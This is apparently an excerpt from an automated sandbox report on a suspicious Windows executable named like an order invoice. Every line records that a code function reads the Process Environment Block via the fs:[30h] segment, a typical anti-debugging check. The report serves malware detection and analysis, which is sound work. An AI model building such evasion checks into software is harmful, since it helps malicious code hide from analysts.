          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FD5E0 mov eax, dword ptr fs:[00000030h]1_2_018FD5E0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]1_2_019AFDE2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]1_2_019AFDE2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]1_2_019AFDE2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]1_2_019AFDE2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019741E8 mov eax, dword ptr fs:[00000030h]1_2_019741E8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9100 mov eax, dword ptr fs:[00000030h]1_2_018E9100
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9100 mov eax, dword ptr fs:[00000030h]1_2_018E9100
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9100 mov eax, dword ptr fs:[00000030h]1_2_018E9100
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0196A537 mov eax, dword ptr fs:[00000030h]1_2_0196A537
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AE539 mov eax, dword ptr fs:[00000030h]1_2_019AE539
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914D3B mov eax, dword ptr fs:[00000030h]1_2_01914D3B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914D3B mov eax, dword ptr fs:[00000030h]1_2_01914D3B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914D3B mov eax, dword ptr fs:[00000030h]1_2_01914D3B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191513A mov eax, dword ptr fs:[00000030h]1_2_0191513A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191513A mov eax, dword ptr fs:[00000030h]1_2_0191513A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8D34 mov eax, dword ptr fs:[00000030h]1_2_019B8D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov ecx, dword ptr fs:[00000030h]1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAD30 mov eax, dword ptr fs:[00000030h]1_2_018EAD30
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01907D50 mov eax, dword ptr fs:[00000030h]1_2_01907D50
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01923D43 mov eax, dword ptr fs:[00000030h]1_2_01923D43
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190B944 mov eax, dword ptr fs:[00000030h]1_2_0190B944
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190B944 mov eax, dword ptr fs:[00000030h]1_2_0190B944
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01963540 mov eax, dword ptr fs:[00000030h]1_2_01963540
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190C577 mov eax, dword ptr fs:[00000030h]1_2_0190C577
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190C577 mov eax, dword ptr fs:[00000030h]1_2_0190C577
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC962 mov eax, dword ptr fs:[00000030h]1_2_018EC962
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB171 mov eax, dword ptr fs:[00000030h]1_2_018EB171
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB171 mov eax, dword ptr fs:[00000030h]1_2_018EB171
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9080 mov eax, dword ptr fs:[00000030h]1_2_018E9080
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01963884 mov eax, dword ptr fs:[00000030h]1_2_01963884
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01963884 mov eax, dword ptr fs:[00000030h]1_2_01963884
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F849B mov eax, dword ptr fs:[00000030h]1_2_018F849B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191F0BF mov ecx, dword ptr fs:[00000030h]1_2_0191F0BF
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191F0BF mov eax, dword ptr fs:[00000030h]1_2_0191F0BF
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191F0BF mov eax, dword ptr fs:[00000030h]1_2_0191F0BF
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h]1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019290AF mov eax, dword ptr fs:[00000030h]1_2_019290AF
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h]1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8CD6 mov eax, dword ptr fs:[00000030h]1_2_019B8CD6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A14FB mov eax, dword ptr fs:[00000030h]1_2_019A14FB
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E58EC mov eax, dword ptr fs:[00000030h]1_2_018E58EC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]1_2_01966CF0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]1_2_01966CF0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]1_2_01966CF0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]1_2_01967016
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]1_2_01967016
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]1_2_01967016
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B4015 mov eax, dword ptr fs:[00000030h]1_2_019B4015
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B4015 mov eax, dword ptr fs:[00000030h]1_2_019B4015
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]1_2_019B740D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]1_2_019B740D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]1_2_019B740D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191BC2C mov eax, dword ptr fs:[00000030h]1_2_0191BC2C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01900050 mov eax, dword ptr fs:[00000030h]1_2_01900050
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01900050 mov eax, dword ptr fs:[00000030h]1_2_01900050
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197C450 mov eax, dword ptr fs:[00000030h]1_2_0197C450
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197C450 mov eax, dword ptr fs:[00000030h]1_2_0197C450
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A44B mov eax, dword ptr fs:[00000030h]1_2_0191A44B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A2073 mov eax, dword ptr fs:[00000030h]1_2_019A2073
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B1074 mov eax, dword ptr fs:[00000030h]1_2_019B1074
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190746D mov eax, dword ptr fs:[00000030h]1_2_0190746D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F1B8F mov eax, dword ptr fs:[00000030h]1_2_018F1B8F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F1B8F mov eax, dword ptr fs:[00000030h]1_2_018F1B8F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191B390 mov eax, dword ptr fs:[00000030h]1_2_0191B390
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]1_2_01967794
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]1_2_01967794
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]1_2_01967794
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912397 mov eax, dword ptr fs:[00000030h]1_2_01912397
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A138A mov eax, dword ptr fs:[00000030h]1_2_019A138A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199D380 mov ecx, dword ptr fs:[00000030h]1_2_0199D380
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F8794 mov eax, dword ptr fs:[00000030h]1_2_018F8794
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]1_2_01914BAD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]1_2_01914BAD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]1_2_01914BAD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B5BA5 mov eax, dword ptr fs:[00000030h]1_2_019B5BA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019653CA mov eax, dword ptr fs:[00000030h]1_2_019653CA
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019653CA mov eax, dword ptr fs:[00000030h]1_2_019653CA
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019237F5 mov eax, dword ptr fs:[00000030h]1_2_019237F5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190DBE9 mov eax, dword ptr fs:[00000030h]1_2_0190DBE9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A131B mov eax, dword ptr fs:[00000030h]1_2_019A131B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190F716 mov eax, dword ptr fs:[00000030h]1_2_0190F716
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FF10 mov eax, dword ptr fs:[00000030h]1_2_0197FF10
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FF10 mov eax, dword ptr fs:[00000030h]1_2_0197FF10
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B070D mov eax, dword ptr fs:[00000030h]1_2_019B070D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B070D mov eax, dword ptr fs:[00000030h]1_2_019B070D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A70E mov eax, dword ptr fs:[00000030h]1_2_0191A70E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A70E mov eax, dword ptr fs:[00000030h]1_2_0191A70E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E4F2E mov eax, dword ptr fs:[00000030h]1_2_018E4F2E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E4F2E mov eax, dword ptr fs:[00000030h]1_2_018E4F2E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191E730 mov eax, dword ptr fs:[00000030h]1_2_0191E730
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8B58 mov eax, dword ptr fs:[00000030h]1_2_019B8B58
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EDB40 mov eax, dword ptr fs:[00000030h]1_2_018EDB40
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FEF40 mov eax, dword ptr fs:[00000030h]1_2_018FEF40
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EF358 mov eax, dword ptr fs:[00000030h]1_2_018EF358
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01913B7A mov eax, dword ptr fs:[00000030h]1_2_01913B7A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01913B7A mov eax, dword ptr fs:[00000030h]1_2_01913B7A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EDB60 mov ecx, dword ptr fs:[00000030h]1_2_018EDB60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FFF60 mov eax, dword ptr fs:[00000030h]1_2_018FFF60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8F6A mov eax, dword ptr fs:[00000030h]1_2_019B8F6A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191D294 mov eax, dword ptr fs:[00000030h]1_2_0191D294
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191D294 mov eax, dword ptr fs:[00000030h]1_2_0191D294
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FE87 mov eax, dword ptr fs:[00000030h]1_2_0197FE87
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191FAB0 mov eax, dword ptr fs:[00000030h]1_2_0191FAB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019646A7 mov eax, dword ptr fs:[00000030h]1_2_019646A7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]1_2_019B0EA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]1_2_019B0EA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]1_2_019B0EA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FAAB0 mov eax, dword ptr fs:[00000030h]1_2_018FAAB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FAAB0 mov eax, dword ptr fs:[00000030h]1_2_018FAAB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8ED6 mov eax, dword ptr fs:[00000030h]1_2_019B8ED6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01928EC7 mov eax, dword ptr fs:[00000030h]1_2_01928EC7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199FEC0 mov eax, dword ptr fs:[00000030h]1_2_0199FEC0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912ACB mov eax, dword ptr fs:[00000030h]1_2_01912ACB
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019136CC mov eax, dword ptr fs:[00000030h]1_2_019136CC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F76E2 mov eax, dword ptr fs:[00000030h]1_2_018F76E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019116E0 mov ecx, dword ptr fs:[00000030h]1_2_019116E0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912AE4 mov eax, dword ptr fs:[00000030h]1_2_01912AE4
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F8A0A mov eax, dword ptr fs:[00000030h]1_2_018F8A0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01903A1C mov eax, dword ptr fs:[00000030h]1_2_01903A1C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A61C mov eax, dword ptr fs:[00000030h]1_2_0191A61C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A61C mov eax, dword ptr fs:[00000030h]1_2_0191A61C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]1_2_018EC600
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]1_2_018EC600
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]1_2_018EC600
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01918E00 mov eax, dword ptr fs:[00000030h]1_2_01918E00
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1608 mov eax, dword ptr fs:[00000030h]1_2_019A1608
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAA16 mov eax, dword ptr fs:[00000030h]1_2_018EAA16
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAA16 mov eax, dword ptr fs:[00000030h]1_2_018EAA16
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov ecx, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199FE3F mov eax, dword ptr fs:[00000030h]1_2_0199FE3F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EE620 mov eax, dword ptr fs:[00000030h]1_2_018EE620
